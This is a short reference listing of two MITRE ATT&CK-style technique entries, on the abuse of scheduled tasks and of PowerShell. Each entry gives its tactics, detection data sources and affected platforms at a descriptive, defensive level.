Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre